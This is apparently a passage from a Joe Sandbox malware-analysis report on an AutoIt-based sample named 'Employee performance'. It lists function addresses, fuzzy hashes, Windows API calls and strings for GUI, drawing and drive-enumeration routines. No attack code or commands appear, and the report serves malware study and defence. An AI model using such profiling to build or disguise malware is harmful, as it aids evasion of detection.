Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: f6a8aaabbb977991276218e8b1d81ed9c15d4a5e06c0fdbae832a9987a5e9524
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: A89143726090A789DB29467A857403EFFE16E923B131A079DD5F2CA1E1FD14C564B620

Function 00FF7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9709589cb8283b9647f1568d198ae612a879dc13ef1dee5fe304c155cce2aa3
Instruction ID: dc02e6e86b2565d12a880328d41a5d04ab8587fe5a3cbf09d84c374eedb58cfd
Opcode Fuzzy Hash: c9709589cb8283b9647f1568d198ae612a879dc13ef1dee5fe304c155cce2aa3
Instruction Fuzzy Hash: 1C618B32A0C70D96EA34792C8C95BBEF394DF82364F100959EB42CB2B5D9599E43F315

Function 00FF7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11553f0c69f3b7b1bc255ed1dddd193d7fbcf316b7b9f37a820e80550faccee2
Instruction ID: dc47338a7b956606dc2dd45e7da18ba914708ae38f93af1ad1c4332aa14c5062
Opcode Fuzzy Hash: 11553f0c69f3b7b1bc255ed1dddd193d7fbcf316b7b9f37a820e80550faccee2
Instruction Fuzzy Hash: 87619A32E0870D52DE3879285C91BBFF388DF42764F90085AEB42DB2B1DA56AD42F315

Function 00FF1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 90993b1cc7899954c10c90672605173a2062aa95cfd0c6962a9596a3e2b8d29c
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 98818533A080A789EB2D423A857403EFFE17E923B131A079DD5F6CB1E1EE649554F660

Function 01042046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c95f7cf2df7b625a7b0573be3ced746f1f61936de28eeccd6f9f451b6549263
Instruction ID: 4f67654b7a043678e26b65c3e2c5e2f829bae330111f77e0e1c4c20638664efc
Opcode Fuzzy Hash: 7c95f7cf2df7b625a7b0573be3ced746f1f61936de28eeccd6f9f451b6549263
Instruction Fuzzy Hash: 7221D5723216158BD728CE79C82267A73E5A754210F54863EF4E7C77C1DE3AA904CB80

Function 01052ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01052B30
DeleteObject.GDI32(00000000), ref: 01052B43
DestroyWindow.USER32 ref: 01052B52
GetDesktopWindow.USER32 ref: 01052B6D
GetWindowRect.USER32(00000000), ref: 01052B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01052CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01052CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052CF8
GetClientRect.USER32(00000000,?), ref: 01052D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01052D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052DA8
GlobalFree.KERNEL32(00000000), ref: 01052DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0106FC38,00000000), ref: 01052DDB
GlobalFree.KERNEL32(00000000), ref: 01052DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 01052E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 01052E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01052E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0105303F

Strings

static, xrefs: 01052D3A, 01052E91
, xrefs: 01052FC5
DISPLAY, xrefs: 01052EA2
AutoIt v3, xrefs: 01052CF2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b298e345b099385fc7e3b7562d9cdc17a4e6a52c2a00a8c74cca2ae9e3550d9f
Instruction ID: 9b77dd510a6a82686d86d67bb73d1fa96cca34699dccd04ebc3eaefa7b5c80cf
Opcode Fuzzy Hash: b298e345b099385fc7e3b7562d9cdc17a4e6a52c2a00a8c74cca2ae9e3550d9f
Instruction Fuzzy Hash: 75028E71500205EFEB24DF64DD89EAE7BB9FF48310F048159F995AB2A5C779AD00CB60

Function 010670D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0106712F
GetSysColorBrush.USER32(0000000F), ref: 01067160
GetSysColor.USER32(0000000F), ref: 0106716C
SetBkColor.GDI32(?,000000FF), ref: 01067186
SelectObject.GDI32(?,?), ref: 01067195
InflateRect.USER32(?,000000FF,000000FF), ref: 010671C0
GetSysColor.USER32(00000010), ref: 010671C8
CreateSolidBrush.GDI32(00000000), ref: 010671CF
FrameRect.USER32(?,?,00000000), ref: 010671DE
DeleteObject.GDI32(00000000), ref: 010671E5
InflateRect.USER32(?,000000FE,000000FE), ref: 01067230
FillRect.USER32(?,?,?), ref: 01067262
GetWindowLongW.USER32(?,000000F0), ref: 01067284

Part of subcall function 010673E8: GetSysColor.USER32(00000012), ref: 01067421
Part of subcall function 010673E8: SetTextColor.GDI32(?,?), ref: 01067425
Part of subcall function 010673E8: GetSysColorBrush.USER32(0000000F), ref: 0106743B
Part of subcall function 010673E8: GetSysColor.USER32(0000000F), ref: 01067446
Part of subcall function 010673E8: GetSysColor.USER32(00000011), ref: 01067463
Part of subcall function 010673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01067471
Part of subcall function 010673E8: SelectObject.GDI32(?,00000000), ref: 01067482
Part of subcall function 010673E8: SetBkColor.GDI32(?,00000000), ref: 0106748B
Part of subcall function 010673E8: SelectObject.GDI32(?,?), ref: 01067498
Part of subcall function 010673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 010674B7
Part of subcall function 010673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010674CE
Part of subcall function 010673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 010674DB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 2a119268e64d25e4e2839715b0e5eecf40e66e816a8a06fa1151e7fb490ed1c7
Instruction ID: 8da13c21c10b3f6e4d728019516f6136fe5dcbbb2e1b427b7f13b812474e4751
Opcode Fuzzy Hash: 2a119268e64d25e4e2839715b0e5eecf40e66e816a8a06fa1151e7fb490ed1c7
Instruction Fuzzy Hash: 3EA18072008301EFE7219F64DD48A5B7BE9FB49324F100A19FAE2961E4D77AD944CB51

Function 00FE8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00FE8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 01026AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 01026AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01026F43

Part of subcall function 00FE8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE8BE8,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 00FE8FC5

SendMessageW.USER32(?,00001053), ref: 01026F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 01026F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 01026FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 01026FB7

Strings

0, xrefs: 01026DCF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: ab4f3fedc18391296773d8f8d45b0fc9016b28a71bf6f8926ae9ba1ed94eb7ed
Instruction ID: 21859283a6d864f675cad6f2e71377f5ca167c457d49190ab5b78ce7b56a31cb
Opcode Fuzzy Hash: ab4f3fedc18391296773d8f8d45b0fc9016b28a71bf6f8926ae9ba1ed94eb7ed
Instruction Fuzzy Hash: 2012E130500261EFEB65EF18C944BAABBE5FF44300F5440A9F9D98B251CB37E892DB91

Function 01052711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0105273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0105286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 010528A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 010528B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 01052900
GetClientRect.USER32(00000000,?), ref: 0105290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 01052955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01052964
GetStockObject.GDI32(00000011), ref: 01052974
SelectObject.GDI32(00000000,00000000), ref: 01052978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 01052988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01052991
DeleteDC.GDI32(00000000), ref: 0105299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010529C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 010529DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 01052A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01052A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 01052A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 01052A77
GetStockObject.GDI32(00000011), ref: 01052A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01052A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 01052A97

Strings

msctls_progress32, xrefs: 01052A13
static, xrefs: 0105294F, 01052A71
DISPLAY, xrefs: 0105295A
AutoIt v3, xrefs: 010528F8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 012b8629689e56df49f105a73240deaabfec823fb1038365e50160bad4d3f2ac
Instruction ID: b0cabe63f3f54d8e32ccda6f9547ad5010c9e16992c3cb2e97d3c8536ea89e44
Opcode Fuzzy Hash: 012b8629689e56df49f105a73240deaabfec823fb1038365e50160bad4d3f2ac
Instruction Fuzzy Hash: F2B16EB2A00215AFEB24DFA8DD45FAF7BA9EF08710F048155F994EB290D779AD40CB50

Function 01044ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 01044AED
GetDriveTypeW.KERNEL32(?,0106CB68,?,\\.\,0106CC08), ref: 01044BCA
SetErrorMode.KERNEL32(00000000,0106CB68,?,\\.\,0106CC08), ref: 01044D36

Strings

Fixed, xrefs: 01044C09
Removable, xrefs: 01044C10, 01044C15
MMC, xrefs: 01044CDE
SAS, xrefs: 01044CC9
USB, xrefs: 01044CB4
SSD, xrefs: 01044C4A
ATAPI, xrefs: 01044C91
SCSI, xrefs: 01044C8A
RAID, xrefs: 01044CBB
iSCSI, xrefs: 01044CC2
Unknown, xrefs: 01044BED, 01044C83
Fibre, xrefs: 01044CAD
FileBackedVirtual, xrefs: 01044CEC
ATA, xrefs: 01044C98
SSA, xrefs: 01044CA6
RAMDisk, xrefs: 01044BF4
SATA, xrefs: 01044CD0
1394, xrefs: 01044C9F
PhysicalDrive, xrefs: 01044B76
Network, xrefs: 01044C02
Virtual, xrefs: 01044CE5
CDROM, xrefs: 01044BFB
\\.\, xrefs: 01044B3F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 9cb6fb7bcf4f2bf0d15c6d93913defd8969c43befe488502580df0044ee9a344
Instruction ID: cfaef0f1c7f03ea917a6479f34bb3816c143fe7d9ceacac0f51f1a388583ad93
Opcode Fuzzy Hash: 9cb6fb7bcf4f2bf0d15c6d93913defd8969c43befe488502580df0044ee9a344
Instruction Fuzzy Hash: FF61D5B0A0410ADBCF44EF68CAD1A7C77E2AB04241B18406AF8D6EF251DB76DD85EB45

Function 010673E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 01067421
SetTextColor.GDI32(?,?), ref: 01067425
GetSysColorBrush.USER32(0000000F), ref: 0106743B
GetSysColor.USER32(0000000F), ref: 01067446
CreateSolidBrush.GDI32(?), ref: 0106744B
GetSysColor.USER32(00000011), ref: 01067463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 01067471
SelectObject.GDI32(?,00000000), ref: 01067482
SetBkColor.GDI32(?,00000000), ref: 0106748B
SelectObject.GDI32(?,?), ref: 01067498
InflateRect.USER32(?,000000FF,000000FF), ref: 010674B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010674CE
GetWindowLongW.USER32(00000000,000000F0), ref: 010674DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0106752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 01067554
InflateRect.USER32(?,000000FD,000000FD), ref: 01067572
DrawFocusRect.USER32(?,?), ref: 0106757D
GetSysColor.USER32(00000011), ref: 0106758E
SetTextColor.GDI32(?,00000000), ref: 01067596
DrawTextW.USER32(?,010670F5,000000FF,?,00000000), ref: 010675A8
SelectObject.GDI32(?,?), ref: 010675BF
DeleteObject.GDI32(?), ref: 010675CA
SelectObject.GDI32(?,?), ref: 010675D0
DeleteObject.GDI32(?), ref: 010675D5
SetTextColor.GDI32(?,?), ref: 010675DB
SetBkColor.GDI32(?,?), ref: 010675E5

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: f33c1e28ff47bc62017e5cc1b50a924efd4d063eabf49f97bef1ca222d6d8ebc
Instruction ID: 8e78d7ad5342581a897270f0432aa8f6843bdaaab09612780098533d301358aa
Opcode Fuzzy Hash: f33c1e28ff47bc62017e5cc1b50a924efd4d063eabf49f97bef1ca222d6d8ebc
Instruction Fuzzy Hash: A7618172900218AFEF119FA4DD48EEE7FB9EF09320F104151FA91AB2A1D7799940CF90

Function 01060FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 01061128
GetDesktopWindow.USER32 ref: 0106113D
GetWindowRect.USER32(00000000), ref: 01061144
GetWindowLongW.USER32(?,000000F0), ref: 01061199
DestroyWindow.USER32(?), ref: 010611B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010611ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0106120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0106121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 01061232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01061245
IsWindowVisible.USER32(00000000), ref: 010612A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 010612BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 010612D0
GetWindowRect.USER32(00000000,?), ref: 010612E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0106130E
GetMonitorInfoW.USER32(00000000,?), ref: 01061328
CopyRect.USER32(?,?), ref: 0106133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 010613AA

Strings

tooltips_class32, xrefs: 010611E6
0, xrefs: 010610D3
(, xrefs: 0106131B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 69baf75ee4878a0067be2de018a4ee51aeb96b612f08853d38c5a71045a34dc8
Instruction ID: d6cac30011fa5b3781491f003455b88b33fa9e297ab5b86eb59f99e050780ed8
Opcode Fuzzy Hash: 69baf75ee4878a0067be2de018a4ee51aeb96b612f08853d38c5a71045a34dc8
Instruction Fuzzy Hash: F7B1AE71604341AFE750DF64C984B6ABBE9FF88310F048919F9D99B261C775E804CB91

Function 01060241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 010602E5
_wcslen.LIBCMT ref: 0106031F
_wcslen.LIBCMT ref: 01060389
_wcslen.LIBCMT ref: 010603F1
_wcslen.LIBCMT ref: 01060475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010604C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01060504

Part of subcall function 00FEF9F2: _wcslen.LIBCMT ref: 00FEF9FD

Part of subcall function 0103223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01032258
Part of subcall function 0103223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0103228A

Strings

GETSELECTEDCOUNT, xrefs: 01060470, 0106048B
SELECT, xrefs: 01060548
SELECTCLEAR, xrefs: 0106052D
DESELECT, xrefs: 0106059C
FINDITEM, xrefs: 01060627
GETITEMCOUNT, xrefs: 01060316, 01060337
VIEWCHANGE, xrefs: 01060675
SELECTALL, xrefs: 01060515
ISSELECTED, xrefs: 010604DD
GETSUBITEMCOUNT, xrefs: 01060384, 0106039F
GETTEXT, xrefs: 010603EC, 01060407
GETSELECTED, xrefs: 010605E1
SELECTINVERT, xrefs: 0106057E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
